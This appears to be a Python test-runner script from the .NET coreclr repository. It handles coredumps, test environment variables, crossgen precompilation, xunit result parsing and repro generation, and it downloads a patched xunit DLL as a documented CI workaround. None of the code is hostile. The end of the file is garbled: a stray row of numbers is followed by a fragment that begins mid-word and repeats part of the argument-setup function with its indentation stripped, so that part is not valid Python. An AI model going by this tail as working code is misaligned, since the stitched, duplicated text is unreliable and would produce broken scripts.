        # inspecting the contents of the dump. See 'man core' for details.
        with open("/proc/self/coredump_filter", "w") as f:
            f.write("0x3F")
def print_info_from_coredump_file(host_os, arch, coredump_name, executable_name):
    """ Dump backtrace information from a coredump to the console.

    Args:
        host_os (String)         : os
        arch (String)            : architecture
        coredump_name (String)   : name of the coredump to print
        executable_name (String) : name of the executable that generated the coredump

    Notes:
        Supported on OSX (lldb) and Linux (gdb) only; a no-op on other
        platforms or when either file is missing. Both debuggers backtrace
        all threads; gdb additionally prints frame locals, which lldb has no
        built-in option for.
    """
    # Bail out quietly when there is nothing to inspect.
    if not os.path.isfile(executable_name):
        print("Not printing coredump due to missing executable: %s" % executable_name)
        return

    if not os.path.isfile(coredump_name):
        print("Not printing coredump due to missing coredump: %s" % coredump_name)
        return

    if host_os == "OSX":
        command = "lldb -c %s -b -o 'bt all' -o 'disassemble -b -p'" % coredump_name
    elif host_os == "Linux":
        command = "gdb --batch -ex \"thread apply all bt full\" -ex \"disassemble /r $pc\" -ex \"quit\" %s %s" % (executable_name, coredump_name)
    else:
        print("Not printing coredump due to unsupported OS: %s" % host_os)
        return

    print("Printing info from coredump: %s" % coredump_name)

    failed = True
    try:
        sys.stdout.flush() # flush output before creating sub-process

        # We specify 'shell=True' as the command may otherwise fail (some systems will
        # complain that the executable cannot be found in the current directory).
        debugger = subprocess.Popen(command, shell=True)
        debugger.communicate()
        failed = debugger.returncode != 0
    except:
        failed = True

    if failed:
        print("Failed to print coredump: %s" % coredump_name)
def preserve_coredump_file(coredump_name, root_storage_location="/tmp/coredumps_coreclr"):
    """ Copies the specified coredump to a new randomly named temporary directory under
        root_storage_location to ensure it is accessible after the workspace is cleaned.

    Args:
        coredump_name (String)         : name of the coredump to preserve
        root_storage_location (String) : the directory under which to copy coredump_name

    Notes:
        root_storage_location defaults to a folder under /tmp to ensure that it is cleaned
        up on next reboot (or after the OS configured time elapses for the folder).
    """
    if not os.path.exists(root_storage_location):
        os.mkdir(root_storage_location)

    # A freshly minted temporary directory guarantees we never collide with
    # coredumps preserved by earlier runs.
    dump_dir = tempfile.mkdtemp('', '', root_storage_location)

    # Copy only when the dump exists and the new directory is still empty; this
    # caps how many dumps we end up storing/uploading.
    should_copy = os.path.isfile(coredump_name) and not os.listdir(dump_dir)
    if should_copy:
        print("Copying coredump file %s to %s" % (coredump_name, dump_dir))
        shutil.copy2(coredump_name, dump_dir)
def inspect_and_delete_coredump_file(host_os, arch, coredump_name):
    """ Prints information from the specified coredump, preserves a backup copy
        of it, and then deletes the original dump.

    Args:
        host_os (String)       : os
        arch (String)          : architecture
        coredump_name (String) : name of the coredump to process
    """
    # The executable that produced the dump is corerun from the current Core_Root.
    corerun_path = "%s/corerun" % os.environ["CORE_ROOT"]
    print_info_from_coredump_file(host_os, arch, coredump_name, corerun_path)
    preserve_coredump_file(coredump_name)
    os.remove(coredump_name)
def inspect_and_delete_coredump_files(host_os, arch, test_location):
    """ Finds all coredumps under test_location, prints some basic information about
        them to the console, and preserves a backup of each dump for investigation.

    Args:
        host_os (String)       : os
        arch (String)          : architecture
        test_location (String) : the folder under which to search for coredumps
    """
    # Depending on distro/configuration, core files are named either "core" or
    # "core.<PID>". The configured pattern (module-level `coredump_pattern`) and,
    # on Linux, /proc/sys/kernel/core_uses_pid tell us which form to expect.
    # On OS X/macOS the kern.corefile value was checked before enabling core dump
    # generation, so the pattern check alone is sufficient there.
    print("Looking for coredumps...")

    uses_pid = "%P" in coredump_pattern
    if not uses_pid and host_os == "Linux" and os.path.isfile("/proc/sys/kernel/core_uses_pid"):
        with open("/proc/sys/kernel/core_uses_pid", "r") as f:
            uses_pid = f.read().rstrip() == "1"

    if uses_pid:
        filter_pattern, regex_pattern = "core.*", "core.[0-9]+"
    else:
        filter_pattern, regex_pattern = "core", "core"

    matched_file_count = 0
    for dir_path, _, file_names in os.walk(test_location):
        # fnmatch narrows the candidates cheaply; the regex confirms the exact form.
        for file_name in fnmatch.filter(file_names, filter_pattern):
            if re.match(regex_pattern, file_name):
                print("Found coredump: %s in %s" % (file_name, dir_path))
                matched_file_count += 1
                inspect_and_delete_coredump_file(host_os, arch, os.path.join(dir_path, file_name))

    print("Found %s coredumps." % matched_file_count)
def run_tests(args,
              test_env_script_path=None):
    """ Run the coreclr tests

    Args:
        args                 : parsed arguments (see setup_args)
        test_env_script_path : Path to script to use to set the test environment, if any.

    Returns:
        The return value of call_msbuild(args), or None when args.skip_test_run is set.
    """
    if args.precompile_core_root:
        precompile_core_root(args)

    if args.skip_test_run:
        return

    # Set default per-test timeout to 15 minutes (in milliseconds).
    per_test_timeout = 15*60*1000

    # Setup the environment
    if args.long_gc:
        print("Running Long GC Tests, extending timeout to 20 minutes.")
        per_test_timeout = 20*60*1000
        print("Setting RunningLongGCTests=1")
        os.environ["RunningLongGCTests"] = "1"

    if args.gcsimulator:
        print("Running GCSimulator tests, extending timeout to one hour.")
        per_test_timeout = 60*60*1000
        print("Setting RunningGCSimulatorTests=1")
        os.environ["RunningGCSimulatorTests"] = "1"

    if args.ilasmroundtrip:
        print("Running ILasm round trip.")
        print("Setting RunningIlasmRoundTrip=1")
        os.environ["RunningIlasmRoundTrip"] = "1"

    if args.run_crossgen_tests:
        print("Running tests R2R")
        print("Setting RunCrossGen=true")
        os.environ["RunCrossGen"] = "true"

    if args.run_crossgen2_tests:
        print("Running tests R2R (Crossgen2)")
        print("Setting RunCrossGen2=true")
        os.environ["RunCrossGen2"] = "true"

    if args.large_version_bubble:
        print("Large Version Bubble enabled")
        os.environ["LargeVersionBubble"] = "true"

    # gc_stress is a module-level flag, configured elsewhere from the test environment.
    if gc_stress:
        print("Running GCStress, extending timeout to 120 minutes.")
        per_test_timeout = 120*60*1000

    if args.limited_core_dumps:
        setup_coredump_generation(args.host_os)

    if args.run_in_context:
        print("Running test in an unloadable AssemblyLoadContext")
        os.environ["CLRCustomTestLauncher"] = args.runincontext_script_path
        os.environ["RunInUnloadableContext"] = "1"
        per_test_timeout = 20*60*1000

    # Set __TestTimeout environment variable, which is the per-test timeout in milliseconds.
    # This is read by the test wrapper invoker, in src\coreclr\tests\src\Common\Coreclr.TestWrapper\CoreclrTestWrapperLib.cs.
    print("Setting __TestTimeout=%s" % str(per_test_timeout))
    os.environ["__TestTimeout"] = str(per_test_timeout)

    # Set CORE_ROOT
    print("Setting CORE_ROOT=%s" % args.core_root)
    os.environ["CORE_ROOT"] = args.core_root

    # Set __TestDotNetCmd so tests which need to run dotnet can use the repo-local script on dev boxes
    os.environ["__TestDotNetCmd"] = args.dotnetcli_script_path

    # Set test env script path if it is set.
    if test_env_script_path is not None:
        print("Setting __TestEnv=%s" % test_env_script_path)
        os.environ["__TestEnv"] = test_env_script_path

    #=====================================================================================================================================================
    #
    # This is a workaround needed to unblock our CI (in particular, Linux/arm and Linux/arm64 jobs) from the following failures appearing almost in every
    # pull request (but hard to reproduce locally)
    #
    # System.IO.FileLoadException: Could not load file or assembly 'Exceptions.Finalization.XUnitWrapper, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'.
    # An operation is not legal in the current state. (Exception from HRESULT: 0x80131509 (COR_E_INVALIDOPERATION))
    #
    # COR_E_INVALIDOPERATION comes from System.InvalidOperationException that is thrown during AssemblyLoadContext.ResolveUsingResolvingEvent
    # when multiple threads attempt to modify an instance of Dictionary (managedAssemblyCache) during Xunit.DependencyContextAssemblyCache.LoadManagedDll call.
    #
    # In order to mitigate the failure we built our own xunit.console.dll with ConcurrentDictionary used for managedAssemblyCache and use this instead of
    # the one pulled from NuGet. The exact code that got built can be found at the following fork of Xunit
    #  * https://github.com/echesakovMSFT/xunit/tree/UseConcurrentDictionaryInDependencyContextAssemblyCache
    #
    # The assembly was built using Microsoft Visual Studio v15.9.0-pre.4.0 Developer Command Prompt using the following commands
    #  1) git clone https://github.com/echesakovMSFT/xunit.git --branch UseConcurrentDictionaryInDependencyContextAssemblyCache --single-branch
    #  2) cd xunit
    #  3) git submodule update --init
    #  4) powershell .\build.ps1 -target packages -buildAssemblyVersion 2.4.1 -buildSemanticVersion 2.4.1-coreclr
    #
    # Then file "xunit\src\xunit.console\bin\Release\netcoreapp2.0\xunit.console.dll" was archived and uploaded to the clrjit blob storage.
    #
    # Ideally, this code should be removed when we find a more robust way of running Xunit tests.
    #
    # References:
    #  * https://github.com/dotnet/runtime/issues/11232
    #  * https://github.com/dotnet/runtime/issues/11320
    #  * https://github.com/xunit/xunit/issues/1842
    #  * https://github.com/xunit/xunit/pull/1846
    #
    #=====================================================================================================================================================

    print("Download and overwrite xunit.console.dll in Core_Root")

    # urllib.urlretrieve on Python 2, urllib.request.urlretrieve on Python 3.
    urlretrieve = urllib.urlretrieve if sys.version_info.major < 3 else urllib.request.urlretrieve

    zipfilename = os.path.join(tempfile.gettempdir(), "xunit.console.dll.zip")
    url = r"https://clrjit.blob.core.windows.net/xunit-console/xunit.console.dll-v2.4.1.zip"
    urlretrieve(url, zipfilename)

    with zipfile.ZipFile(zipfilename,"r") as ziparch:
        ziparch.extractall(os.path.join(args.core_root, "xunit"))

    os.remove(zipfilename)
    assert not os.path.isfile(zipfilename)

    return call_msbuild(args)
def setup_args(args):
    """ Setup the args based on the argparser obj

    Args:
        args(ArgParser): Parsed arguments

    Notes:
        If there is no core_root, or test location passed, create a default
        location using the build type and the arch.
    """
    # Browser/Android runs do not use a host Core_Root layout.
    requires_coreroot = args.host_os != "Browser" and args.host_os != "Android"
    coreclr_setup_args = CoreclrArguments(args,
                                          require_built_test_dir=True,
                                          require_built_core_root=requires_coreroot,
                                          require_built_product_dir=False)

    normal_location = os.path.join(coreclr_setup_args.artifacts_location, "tests", "coreclr", "%s.%s.%s" % (coreclr_setup_args.host_os, coreclr_setup_args.arch, coreclr_setup_args.build_type))

    # If we have supplied our own test location then we need to create a test location
    # that the scripting will expect. As it is now, there is a dependency on the
    # test location being under test/<os>.<build_type>.<arch>

    # Make sure that we are using the correct build_type. This is a test drop, it is possible
    # that we are inferring the build type to be Debug incorrectly.
    if coreclr_setup_args.build_type not in coreclr_setup_args.test_location:
        # Remove punctuation
        corrected_build_type = re.sub("[%s]" % string.punctuation, "", coreclr_setup_args.test_location.split(".")[-1])
        coreclr_setup_args.verify(corrected_build_type,
                                  "build_type",
                                  coreclr_setup_args.check_build_type,
                                  "Unsupported configuration: %s.\nSupported configurations: %s" % (corrected_build_type, ", ".join(coreclr_setup_args.valid_build_types)))

    if coreclr_setup_args.test_location is not None and coreclr_setup_args.test_location != normal_location:
        print("Error, msbuild currently expects tests in {} (got test_location {})".format(normal_location, coreclr_setup_args.test_location))
        raise Exception("Error, msbuild currently expects tests in artifacts/tests/...")

    # The following arguments are copied straight through from the command line;
    # verify() with an always-true predicate simply attaches each one to
    # coreclr_setup_args. (This replaces 18 identical copy-pasted verify calls.)
    passthrough_args = [
        "test_env",
        "analyze_results_only",
        "crossgen_altjit",
        "rid",
        "il_link",
        "long_gc",
        "gcsimulator",
        "ilasmroundtrip",
        "large_version_bubble",
        "run_crossgen_tests",
        "run_crossgen2_tests",
        "precompile_core_root",
        "skip_test_run",
        "sequential",
        "verbose",
        "limited_core_dumps",
        "test_native_bin_location",
        "run_in_context"
    ]
    for arg_name in passthrough_args:
        coreclr_setup_args.verify(args,
                                  arg_name,
                                  lambda arg: True,
                                  "Error setting %s" % arg_name)

    is_same_os = False
    is_same_arch = False
    is_same_build_type = False

    # We will write out build information into the test directory. This is used
    # by run.py to determine whether we need to rebuild the test wrappers.
    if os.path.isfile(os.path.join(coreclr_setup_args.test_location, "build_info.json")):
        with open(os.path.join(coreclr_setup_args.test_location, "build_info.json")) as file_handle:
            build_info = json.load(file_handle)
        is_same_os = build_info["build_os"] == coreclr_setup_args.host_os
        is_same_arch = build_info["build_arch"] == coreclr_setup_args.arch
        is_same_build_type = build_info["build_type"] == coreclr_setup_args.build_type

    # Non-Windows test drops built elsewhere need the native test binaries
    # location to be resolved (and validated) explicitly.
    if coreclr_setup_args.host_os != "windows" and not (is_same_os and is_same_arch and is_same_build_type):
        test_native_bin_location = None
        if args.test_native_bin_location is None:
            test_native_bin_location = os.path.join(os.path.join(coreclr_setup_args.artifacts_location, "tests", "coreclr", "obj", "%s.%s.%s" % (coreclr_setup_args.host_os, coreclr_setup_args.arch, coreclr_setup_args.build_type)))
        else:
            test_native_bin_location = args.test_native_bin_location
        coreclr_setup_args.verify(test_native_bin_location,
                                  "test_native_bin_location",
                                  lambda test_native_bin_location: os.path.isdir(test_native_bin_location),
                                  "Error setting test_native_bin_location")
    else:
        setattr(coreclr_setup_args, "test_native_bin_location", None)

    print("host_os                  : %s" % coreclr_setup_args.host_os)
    print("arch                     : %s" % coreclr_setup_args.arch)
    print("build_type               : %s" % coreclr_setup_args.build_type)
    print("runtime_repo_location    : %s" % coreclr_setup_args.runtime_repo_location)
    print("product_location         : %s" % coreclr_setup_args.product_location)
    print("core_root                : %s" % coreclr_setup_args.core_root)
    print("test_location            : %s" % coreclr_setup_args.test_location)
    print("test_native_bin_location : %s" % coreclr_setup_args.test_native_bin_location)

    # Derived tool/script paths; Windows uses .exe/.cmd suffixes, Unix .sh or none.
    coreclr_setup_args.crossgen_path = os.path.join(coreclr_setup_args.core_root, "crossgen%s" % (".exe" if coreclr_setup_args.host_os == "windows" else ""))
    coreclr_setup_args.corerun_path = os.path.join(coreclr_setup_args.core_root, "corerun%s" % (".exe" if coreclr_setup_args.host_os == "windows" else ""))
    coreclr_setup_args.dotnetcli_script_path = os.path.join(coreclr_setup_args.runtime_repo_location, "dotnet%s" % (".cmd" if coreclr_setup_args.host_os == "windows" else ".sh"))
    coreclr_setup_args.coreclr_tests_dir = os.path.join(coreclr_setup_args.coreclr_dir, "tests")
    coreclr_setup_args.coreclr_tests_src_dir = os.path.join(coreclr_setup_args.runtime_repo_location, "src", "tests")
    coreclr_setup_args.runincontext_script_path = os.path.join(coreclr_setup_args.coreclr_tests_src_dir, "Common", "scripts", "runincontext%s" % (".cmd" if coreclr_setup_args.host_os == "windows" else ".sh"))
    coreclr_setup_args.logs_dir = os.path.join(coreclr_setup_args.artifacts_location, "log")

    return coreclr_setup_args
def precompile_core_root(args):
    """ Precompile all of the assemblies in the core_root directory

    Args:
        args : parsed arguments (provides host_os, arch, test_location,
             : core_root, crossgen_path and crossgen_altjit)
    """
    # Regex patterns for assemblies we never attempt to precompile.
    skip_list = [
        ".*xunit.*",
        ".*api-ms-win-core.*",
        ".*api-ms-win.*",
        ".*System.Private.CoreLib.*"
    ]

    unix_skip_list = [
        ".*mscorlib.*",
        ".*System.Runtime.WindowsRuntime.*",
        ".*System.Runtime.WindowsRuntime.UI.Xaml.*",
        ".*R2RDump.dll.*"
    ]

    arm64_unix_skip_list = [
        ".*Microsoft.CodeAnalysis.VisualBasic.*",
        ".*System.Net.NameResolution.*",
        ".*System.Net.Sockets.*",
        ".*System.Net.Primitives.*"
    ]

    if args.host_os != "windows":
        skip_list += unix_skip_list

        if args.arch == "arm64":
            skip_list += arm64_unix_skip_list

    assert os.path.isdir(args.test_location)
    assert os.path.isdir(args.core_root)

    def call_crossgen(file, env):
        # Run crossgen on a single assembly; returns True on success.
        assert os.path.isfile(args.crossgen_path)
        command = [args.crossgen_path, "/Platform_Assemblies_Paths", args.core_root, file]
        proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
        proc.communicate()

        return_code = proc.returncode

        # crossgen exits with this specific HRESULT (as a signed 32-bit int) when
        # the input is not a managed assembly; treat that as a benign skip.
        if return_code == -2146230517:
            print("%s is not a managed assembly." % file)
            return False

        if return_code != 0:
            print("Unable to precompile %s (%d)" % (file, return_code))
            return False

        print("Successfully precompiled %s" % file)
        return True

    print("Precompiling all assemblies in %s" % args.core_root)
    print("")

    env = os.environ.copy()

    # If requested, configure an alternate JIT for crossgen via COMPlus knobs.
    if args.crossgen_altjit is not None:
        env["COMPlus_AltJit"]="*"
        env["COMPlus_AltJitNgen"]="*"
        env["COMPlus_AltJitName"]=args.crossgen_altjit
        env["COMPlus_AltJitAssertOnNYI"]="1"
        env["COMPlus_NoGuiOnAssert"]="1"
        env["COMPlus_ContinueOnAssert"]="0"

    dlls = [os.path.join(args.core_root, item) for item in os.listdir(args.core_root) if item.endswith("dll") and "mscorlib" not in item]

    def in_skip_list(item):
        # True when any skip pattern matches; returns on first hit instead of
        # scanning all patterns as the original did.
        for skip_re in skip_list:
            if re.match(skip_re, item.lower()) is not None:
                return True
        return False

    dlls = [dll for dll in dlls if not in_skip_list(dll)]

    for dll in dlls:
        call_crossgen(dll, env)

    print("")
def to_unicode(s):
    """ Return `s` as a unicode string.

    On Python 2 this decodes the byte string from UTF-8; on Python 3 every str
    is already unicode, so the value is returned unchanged.
    """
    if sys.version_info.major < 3:
        return unicode(s, "utf-8")
    return s
def find_test_from_name(host_os, test_location, test_name):
    """ Given a test's name return the location on disk

    Args:
        host_os (str)       : os
        test_location (str) : path to the coreclr tests
        test_name (str)     : Name of the test, all special characters will have
                            : been replaced with underscores.

    Return:
        test_path (str): Path of the test based on its name, or None when no
                       : matching file could be found.

    Notes:
        Xunit reports test names with punctuation replaced by underscores, so
        this walks the directory tree segment by segment, undoing that
        substitution against the actual directory listings. Listings are cached
        in the module-level file_name_cache (a dict of directory ->
        {underscore-substituted name: real name}).
    """
    location = test_name

    # Lambdas and helpers
    is_file_or_dir = lambda path : os.path.isdir(path) or os.path.isfile(path)
    def match_filename(test_path):
        # Scan through the test directory looking for a similar
        # file
        global file_name_cache

        if not os.path.isdir(os.path.dirname(test_path)):
            pass  # deliberate no-op: the assert below reports the failure

        assert os.path.isdir(os.path.dirname(test_path))
        size_of_largest_name_file = 0

        # Look up (or build and cache) the substituted-name mapping for this directory.
        dir_contents = file_name_cache[os.path.dirname(test_path)]

        if dir_contents is None:
            dir_contents = defaultdict(lambda: None)
            for item in os.listdir(os.path.dirname(test_path)):
                dir_contents[re.sub("[%s]" % string.punctuation, "_", item)] = item

            file_name_cache[os.path.dirname(test_path)] = dir_contents

        # It is possible there has already been a match
        # therefore we need to remove the punctuation again.
        basename_to_match = re.sub("[%s]" % string.punctuation, "_", os.path.basename(test_path))
        if basename_to_match in dir_contents:
            test_path = os.path.join(os.path.dirname(test_path), dir_contents[basename_to_match])

        size_of_largest_name_file = len(max(dir_contents, key=len))

        return test_path, size_of_largest_name_file

    def dir_has_nested_substrings(test_path, test_item):
        """ A directory has multiple paths where one path is a substring of another
        """
        # Uses the same cached mapping as match_filename, populating it on first use.
        dir_contents = file_name_cache[os.path.dirname(test_path)]

        if dir_contents is None:
            dir_contents = defaultdict(lambda: None)
            for item in os.listdir(os.path.dirname(test_path)):
                dir_contents[re.sub("[%s]" % string.punctuation, "_", item)] = item

            file_name_cache[os.path.dirname(test_path)] = dir_contents

        test_item = re.sub("[%s]" % string.punctuation, "_", test_item)

        count = 0
        for item in dir_contents:
            if test_item in item:
                count += 1

        return count > 1

    # Find the test by searching down the directory list.
    starting_path = test_location
    loc_split = location.split("_")
    append = False
    for index, item in enumerate(loc_split):
        if not append:
            test_path = os.path.join(starting_path, item)
        else:
            # The previous segment did not resolve on its own; rejoin it with
            # this segment using an underscore and match against the real listing.
            append = False
            test_path, size_of_largest_name_file = match_filename(starting_path + "_" + item)

        if not is_file_or_dir(test_path):
            append = True

        # It is possible that there is another directory that is named
        # without an underscore.
        elif index + 1 < len(loc_split) and os.path.isdir(test_path):
            next_test_path = os.path.join(test_path, loc_split[index + 1])

            if not is_file_or_dir(next_test_path) or dir_has_nested_substrings(test_path, item):
                added_path = test_path
                for forward_index in range(index + 1, len(loc_split)):
                    # Keep appending segments until something exists on disk, or the
                    # candidate grows longer than any real name in the directory.
                    added_path, size_of_largest_name_file = match_filename(added_path + "_" + loc_split[forward_index])
                    if is_file_or_dir(added_path):
                        append = True
                        break
                    elif size_of_largest_name_file < len(os.path.basename(added_path)):
                        break

        starting_path = test_path

    location = starting_path
    if not os.path.isfile(location):
        print("Warning: couldn't find test: %s" % test_name)
        return None

    assert(os.path.isfile(location))
    return location
def parse_test_results(args):
    """ Parse the test results for test execution information

    Args:
        args : arguments (provides logs_dir, host_os, arch, build_type, test_location)

    Returns:
        defaultdict keyed by test name whose values describe each test
        (name, test_path, failed, skipped, passed, time, test_output), or
        None when no testRun.xml could be located.
    """
    log_path = os.path.join(args.logs_dir, "TestRunResults_%s_%s_%s" % (args.host_os, args.arch, args.build_type))
    print("Parsing test results from (%s)" % log_path)

    test_run_location = os.path.join(args.logs_dir, "testRun.xml")

    if not os.path.isfile(test_run_location):
        # Check if this is a casing issue
        found = False
        for item in os.listdir(args.logs_dir):
            item_lower = item.lower()
            if item_lower == "testrun.xml":
                # Correct the name.
                os.rename(os.path.join(args.logs_dir, item), test_run_location)
                found = True
                break

        if not found:
            print("Unable to find testRun.xml. This normally means the tests did not run.")
            print("It could also mean there was a problem logging. Please run the tests again.")
            return

    print("Analyzing {}".format(test_run_location))
    assemblies = xml.etree.ElementTree.parse(test_run_location).getroot()
    tests = defaultdict(lambda: None)

    for assembly in assemblies:
        for collection in assembly:
            if collection.tag == "errors" and collection.text is not None:
                # Something went wrong during running the tests.
                print("Error running the tests, please run run.py again.")
                sys.exit(1)
            elif collection.tag != "errors":
                test_name = None
                for test in collection:
                    # The on-disk test name is the xunit type (truncated at "._")
                    # concatenated with the method name. (Renamed from `type`,
                    # which shadowed the builtin.)
                    test_type = test.attrib["type"]
                    method = test.attrib["method"]

                    test_type = test_type.split("._")[0]
                    test_name = test_type + method

                assert test_name is not None

                failed = collection.attrib["failed"]
                skipped = collection.attrib["skipped"]
                passed = collection.attrib["passed"]
                time = float(collection.attrib["time"])

                test_output = None

                if failed == "1":
                    failure_info = collection[0][0]
                    test_output = failure_info.text

                test_location_on_filesystem = find_test_from_name(args.host_os, args.test_location, test_name)

                if test_location_on_filesystem is not None:
                    assert os.path.isfile(test_location_on_filesystem)

                    assert tests[test_name] is None
                    tests[test_name] = defaultdict(lambda: None, {
                        "name": test_name,
                        "test_path": test_location_on_filesystem,
                        "failed": failed,
                        "skipped": skipped,
                        "passed": passed,
                        "time": time,
                        "test_output": test_output
                    })

    return tests
def print_summary(tests):
    """ Print a summary of the test results

    Args:
        tests (defaultdict[String]: { }): The tests that were reported by
                                        : xunit
    """
    assert tests is not None

    failed_tests = []
    passed_tests = []
    skipped_tests = []

    # Bucket every test by outcome ("failed"/"passed"/"skipped" are "0"/"1" strings).
    for test in tests:
        test = tests[test]

        if test["failed"] == "1":
            failed_tests.append(test)
        elif test["passed"] == "1":
            passed_tests.append(test)
        else:
            skipped_tests.append(test)

    # Slowest tests first within each bucket.
    failed_tests.sort(key=lambda item: item["time"], reverse=True)
    passed_tests.sort(key=lambda item: item["time"], reverse=True)
    skipped_tests.sort(key=lambda item: item["time"], reverse=True)

    def print_tests_helper(tests, stop_count):
        # Print each test's path with its elapsed time in the largest sensible
        # unit; stop after stop_count entries (None means print everything).
        for index, item in enumerate(tests):
            time = item["time"]
            unit = "seconds"
            time_remainder = ""
            second_unit = ""
            saved_time = time
            remainder_str = ""

            # If it can be expressed in hours
            if time > 60**2:
                time = saved_time / (60**2)
                time_remainder = saved_time % (60**2)
                time_remainder /= 60
                time_remainder = math.floor(time_remainder)
                unit = "hours"
                second_unit = "minutes"
                remainder_str = " %s %s" % (int(time_remainder), second_unit)
            elif 60 < time < 60**2:
                time = saved_time / 60
                time_remainder = saved_time % 60
                time_remainder = math.floor(time_remainder)
                unit = "minutes"
                second_unit = "seconds"
                remainder_str = " %s %s" % (int(time_remainder), second_unit)

            print("%s (%d %s%s)" % (item["test_path"], time, unit, remainder_str))

            if stop_count is not None:
                if index >= stop_count:
                    break

    if len(failed_tests) > 0:
        print("%d failed tests:" % len(failed_tests))
        print("")
        print_tests_helper(failed_tests, None)

    # The following code is currently disabled, as it produces too much verbosity in a normal
    # test run. It could be put under a switch, or else just enabled as needed when investigating
    # test slowness.
    #
    # if len(passed_tests) > 50:
    #     print("")
    #     print("50 slowest passing tests:")
    #     print("")
    #     print_tests_helper(passed_tests, 50)

    if len(failed_tests) > 0:
        print("")
        print("#################################################################")
        print("Output of failing tests:")
        print("")

        for item in failed_tests:
            print("[%s]: " % item["test_path"])
            print("")

            test_output = item["test_output"]

            # XUnit results are captured as escaped characters.
            #test_output = test_output.replace("\\r", "\r")
            #test_output = test_output.replace("\\n", "\n")
            #test_output = test_output.replace("/r", "\r")
            #test_output = test_output.replace("/n", "\n")

            # Replace CR/LF by just LF; Python "print", below, will map as necessary on the platform.
            # If we don't do this, then Python on Windows will convert \r\n to \r\r\n on output.
            test_output = test_output.replace("\r\n", "\n")

            unicode_output = None
            if sys.version_info < (3,0):
                # Handle unicode characters in output in python2.*
                try:
                    unicode_output = unicode(test_output, "utf-8")
                except Exception:
                    # Was a bare "except:"; narrowed to Exception.
                    print("Error: failed to convert Unicode output")
            else:
                unicode_output = test_output

            if unicode_output is not None:
                print(unicode_output)
            print("")

        print("")
        print("#################################################################")
        print("End of output of failing tests")
        print("#################################################################")
        print("")

    print("")
    print("Total tests run : %d" % len(tests))
    print("Total passing tests: %d" % len(passed_tests))
    print("Total failed tests : %d" % len(failed_tests))
    print("Total skipped tests: %d" % len(skipped_tests))
    print("")
def create_repro(args, env, tests):
    """ Go through the failing tests and create repros for them

    Args:
        args
        env
        tests (defaultdict[String]: { }): The tests that were reported by
                                        : xunit
    """
    assert tests is not None

    failed_tests = [tests[name] for name in tests if tests[name]["failed"] == "1"]
    if not failed_tests:
        return

    repro_location = os.path.join(args.artifacts_location, "repro", "%s.%s.%s" % (args.host_os, args.arch, args.build_type))

    # Start from a clean repro directory every run.
    if os.path.isdir(repro_location):
        shutil.rmtree(repro_location)

    print("")
    print("Creating repro files at: %s" % repro_location)

    os.makedirs(repro_location)
    assert os.path.isdir(repro_location)

    # Now that the repro_location exists under <runtime>/artifacts/repro,
    # write a wrapper per failing test which simply re-runs that test with
    # the captured environment.
    for failing_test in failed_tests:
        debug_env = DebugEnv(args, env, failing_test)
        debug_env.write_repro()

    print("Repro files written.")
################################################################################
# Main
################################################################################
def main(args):
    """ Orchestrate a coreclr test run.

    Runs the tests (unless --analyze_results_only was passed), then parses the
    xunit results, prints a summary, and writes repro scripts for any failures.

    Args:
        args : the raw argparse namespace; replaced below by the validated
             : CoreclrArguments object from setup_args.

    Return:
        ret_code (int): return code from the test run (0 when only analyzing).
    """
    global g_verbose
    g_verbose = args.verbose

    ret_code = 0

    # Validate/normalize the arguments and derive tool paths.
    args = setup_args(args)

    # Environment captured here is reused later when writing repro scripts.
    env = get_environment(test_env=args.test_env)
    if not args.analyze_results_only:
        if args.test_env is not None:
            ret_code = run_tests(args, args.test_env)
        else:
            # No explicit test-env script: create a temporary one and run with it.
            ret_code = create_and_use_test_env(args.host_os,
                                               env,
                                               lambda test_env_script_path: run_tests(args, test_env_script_path))
        print("Test run finished.")

    if not args.skip_test_run:
        tests = parse_test_results(args)

        if tests is not None:
            print_summary(tests)
            create_repro(args, env, tests)

    return ret_code
################################################################################
# __main__
################################################################################
if __name__ == "__main__":
    # Script entry point: parse the command line (parser is defined at module
    # scope) and exit with the test run's return code.
    args = parser.parse_args()
    sys.exit(main(args))
| 38.076034 | 230 | 0.603336 |
This requires all tests run on linux x64 to be built by the
# same platform and arch. If this is not done, the tests will run correctly;
# however, expect failures due to incorrect exclusions in the xunit
# wrappers setup at build time.
#
# Note that for linux targets the native components to the tests are still built
# by the product build. This requires all native components to be either copied
# into the Core_Root directory or the test's managed directory. The latter is
ontext")
is_same_os = False
is_same_arch = False
is_same_build_type = False
if os.path.isfile(os.path.join(coreclr_setup_args.test_location, "build_info.json")):
with open(os.path.join(coreclr_setup_args.test_location, "build_info.json")) as file_handle:
build_info = json.load(file_handle)
is_same_os = build_info["build_os"] == coreclr_setup_args.host_os
is_same_arch = build_info["build_arch"] == coreclr_setup_args.arch
is_same_build_type = build_info["build_type"] == coreclr_setup_args.build_type
if coreclr_setup_args.host_os != "windows" and not (is_same_os and is_same_arch and is_same_build_type):
test_native_bin_location = None
if args.test_native_bin_location is None:
test_native_bin_location = os.path.join(os.path.join(coreclr_setup_args.artifacts_location, "tests", "coreclr", "obj", "%s.%s.%s" % (coreclr_setup_args.host_os, coreclr_setup_args.arch, coreclr_setup_args.build_type)))
else:
test_native_bin_location = args.test_native_bin_location
coreclr_setup_args.verify(test_native_bin_location,
"test_native_bin_location",
lambda test_native_bin_location: os.path.isdir(test_native_bin_location),
"Error setting test_native_bin_location")
else:
setattr(coreclr_setup_args, "test_native_bin_location", None)
print("host_os : %s" % coreclr_setup_args.host_os)
print("arch : %s" % coreclr_setup_args.arch)
print("build_type : %s" % coreclr_setup_args.build_type)
print("runtime_repo_location : %s" % coreclr_setup_args.runtime_repo_location)
print("product_location : %s" % coreclr_setup_args.product_location)
print("core_root : %s" % coreclr_setup_args.core_root)
print("test_location : %s" % coreclr_setup_args.test_location)
print("test_native_bin_location : %s" % coreclr_setup_args.test_native_bin_location)
coreclr_setup_args.crossgen_path = os.path.join(coreclr_setup_args.core_root, "crossgen%s" % (".exe" if coreclr_setup_args.host_os == "windows" else ""))
coreclr_setup_args.corerun_path = os.path.join(coreclr_setup_args.core_root, "corerun%s" % (".exe" if coreclr_setup_args.host_os == "windows" else ""))
coreclr_setup_args.dotnetcli_script_path = os.path.join(coreclr_setup_args.runtime_repo_location, "dotnet%s" % (".cmd" if coreclr_setup_args.host_os == "windows" else ".sh"))
coreclr_setup_args.coreclr_tests_dir = os.path.join(coreclr_setup_args.coreclr_dir, "tests")
coreclr_setup_args.coreclr_tests_src_dir = os.path.join(coreclr_setup_args.runtime_repo_location, "src", "tests")
